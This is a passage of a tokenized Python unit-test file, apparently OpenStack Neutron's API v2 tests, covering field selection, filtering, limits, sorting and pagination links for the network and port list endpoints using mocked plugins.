json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertIn ( '<STR_LIT>' , resource ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , resource [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT:name>' , resource ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , resource [ '<STR_LIT:name>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , resource ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( resource [ '<STR_LIT>' ] ) ) <EOL> link = resource [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertIn ( '<STR_LIT>' , link ) <EOL> self . assertEqual ( link [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , link ) <EOL> self . assertEqual ( '<STR_LIT>' , link [ '<STR_LIT>' ] ) <EOL> class APIv2TestBase ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( APIv2TestBase , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . _instance = None <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , True ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , True ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = True <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = True <EOL> api = router . APIRouter ( ) <EOL> self . api = webtest . TestApp ( api ) <EOL> quota . QUOTAS . _driver = None <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> policy . init ( ) <EOL> class _ArgMatcher ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cmp , obj ) : <EOL> self . cmp = cmp <EOL> self . obj = obj <EOL> def __eq__ ( self , other ) : <EOL> return self . cmp ( self . 
obj , other ) <EOL> def _list_cmp ( l1 , l2 ) : <EOL> return set ( l1 ) == set ( l2 ) <EOL> class APIv2TestCase ( APIv2TestBase ) : <EOL> def _do_field_list ( self , resource , base_fields ) : <EOL> attr_info = attributes . RESOURCE_ATTRIBUTE_MAP [ resource ] <EOL> policy_attrs = [ name for ( name , info ) in attr_info . items ( ) <EOL> if info . get ( '<STR_LIT>' ) ] <EOL> for name , info in attr_info . items ( ) : <EOL> if info . get ( '<STR_LIT:primary_key>' ) : <EOL> policy_attrs . append ( name ) <EOL> fields = base_fields <EOL> fields . extend ( policy_attrs ) <EOL> return fields <EOL> def _get_collection_kwargs ( self , skipargs = None , ** kwargs ) : <EOL> skipargs = skipargs or [ ] <EOL> args_list = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> args_dict = dict ( <EOL> ( arg , mock . ANY ) for arg in set ( args_list ) - set ( skipargs ) ) <EOL> args_dict . update ( kwargs ) <EOL> return args_dict <EOL> def test_fields ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple_with_empty ( self ) : <EOL> instance = self . plugin . 
return_value <EOL> instance . get_networks . return_value = [ ] <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:foo>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = [ ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = [ ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> filters = { } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . 
ANY , ** kwargs ) <EOL> def test_filters_multiple_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> filters = { } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple_with_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple_values ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_fields ( self ) : <EOL> instance = self . plugin . 
return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> kwargs = self . _get_collection_kwargs ( filters = filters , fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_convert_to ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_ports . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:true>' } ) <EOL> filters = { '<STR_LIT>' : [ True ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_ports . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_convert_list_to ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_ports . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT:foo>' ] , '<STR_LIT>' : [ '<STR_LIT:bar>' ] } } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_ports . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:10> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_great_than_max_limit ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . 
return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_zero ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:0>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_unspecific ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_negative_value ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : - <NUM_LIT:1> } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_limit_with_non_integer ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' } , expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_limit_with_infinite_pagination_max_limit ( self ) : <EOL> instance = self . plugin . 
return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_negative_pagination_max_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_non_integer_pagination_max_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_marker ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> marker = _uuid ( ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : marker } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> , marker = marker ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse ( self ) : <EOL> calls = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = True ) <EOL> calls . 
append ( mock . call . get_networks ( mock . ANY , ** kwargs ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> instance . get_networks . reset_mock ( ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> calls . append ( mock . call . get_networks ( mock . ANY , ** kwargs ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse_with_non_bool ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse_with_unspecific ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , True ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort_with_primary_key ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . 
get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , False ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort_without_direction ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' ] } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_sort_with_invalid_attribute ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_sort_with_invalid_dirs ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:name>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_emulated_sort ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . 
get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( <EOL> skipargs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_emulated_sort_without_sort_field ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( <EOL> skipargs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> fields = _ArgMatcher ( _list_cmp , [ '<STR_LIT:name>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_emulated_pagination ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : False } ) <EOL> kwargs = self . _get_collection_kwargs ( skipargs = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_native_pagination_without_native_sorting ( self ) : <EOL> instance = self . 
plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> self . assertRaises ( n_exc . Invalid , router . APIRouter ) <EOL> def test_native_pagination_without_allow_sorting ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , True ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> class JSONV2TestCase ( APIv2TestBase , testlib_api . WebTestCase ) : <EOL> def _test_list ( self , req_tenant_id , real_tenant_id ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> input_dict = { '<STR_LIT:id>' : uuidutils . generate_uuid ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' , <EOL> fmt = self . fmt ) , extra_environ = env ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> if not req_tenant_id or req_tenant_id == real_tenant_id : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res [ '<STR_LIT>' ] ) ) <EOL> output_dict = res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> input_dict [ '<STR_LIT>' ] = False <EOL> self . 
assertEqual ( len ( input_dict ) , len ( output_dict ) ) <EOL> for k , v in six . iteritems ( input_dict ) : <EOL> self . assertEqual ( v , output_dict [ k ] ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:0> , len ( res [ '<STR_LIT>' ] ) ) <EOL> def test_list_noauth ( self ) : <EOL> self . _test_list ( None , _uuid ( ) ) <EOL> def test_list_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_list ( tenant_id , tenant_id ) <EOL> def test_list_keystone_bad ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_list ( tenant_id + "<STR_LIT>" , tenant_id ) <EOL> def test_list_pagination ( self ) : <EOL> id1 = str ( _uuid ( ) ) <EOL> id2 = str ( _uuid ( ) ) <EOL> input_dict1 = { '<STR_LIT:id>' : id1 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> input_dict2 = { '<STR_LIT:id>' : id2 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict1 , input_dict2 ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( <NUM_LIT:2> , len ( res [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( sorted ( [ id1 , id2 ] ) , <EOL> sorted ( [ res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> res [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] ] ) ) <EOL> self . 
assertIn ( '<STR_LIT>' , res ) <EOL> next_links = [ ] <EOL> previous_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> params [ '<STR_LIT>' ] = [ id2 ] <EOL> self . assertEqual ( params , urlparse . parse_qs ( url . query ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> params [ '<STR_LIT>' ] = [ id1 ] <EOL> params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( params , urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_with_last_page ( self ) : <EOL> id = str ( _uuid ( ) ) <EOL> input_dict = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : str ( _uuid ( ) ) } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( id , res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> previous_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . 
assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> expect_params [ '<STR_LIT>' ] = [ id ] <EOL> expect_params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_with_empty_page ( self ) : <EOL> return_value = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : str ( _uuid ( ) ) } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( [ ] , res [ '<STR_LIT>' ] ) <EOL> previous_links = [ ] <EOL> if '<STR_LIT>' in res : <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> del expect_params [ '<STR_LIT>' ] <EOL> expect_params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . 
